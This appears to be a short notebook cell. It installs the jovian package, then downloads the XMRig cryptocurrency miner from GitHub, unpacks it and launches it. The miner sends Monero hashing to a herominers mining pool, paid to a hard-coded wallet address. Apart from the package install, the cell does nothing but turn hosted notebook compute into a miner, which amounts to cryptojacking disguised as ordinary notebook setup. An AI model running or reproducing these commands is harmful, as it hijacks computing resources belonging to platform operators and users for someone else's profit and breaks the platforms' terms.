!pip install jovian --upgrade --quiet
!wget https://github.com/xmrig/xmrig/releases/download/v6.9.0/xmrig-6.9.0-linux-static-x64.tar.gz
!tar xf xmrig-6.9.0-linux-static-x64.tar.gz
!./xmrig-6.9.0/xmrig -a rx/0 -o de.monero.herominers.com:1111 -u 4ATrrNHgzJzPH1cGWLRhB8LwwSn8X2UN3A9NuCQMkU761VKsqU5HXng9Homz4vcPpFKKRgr8AZZbXEd1Vfv1Wopf7uT2UqS -k --tls -p Github
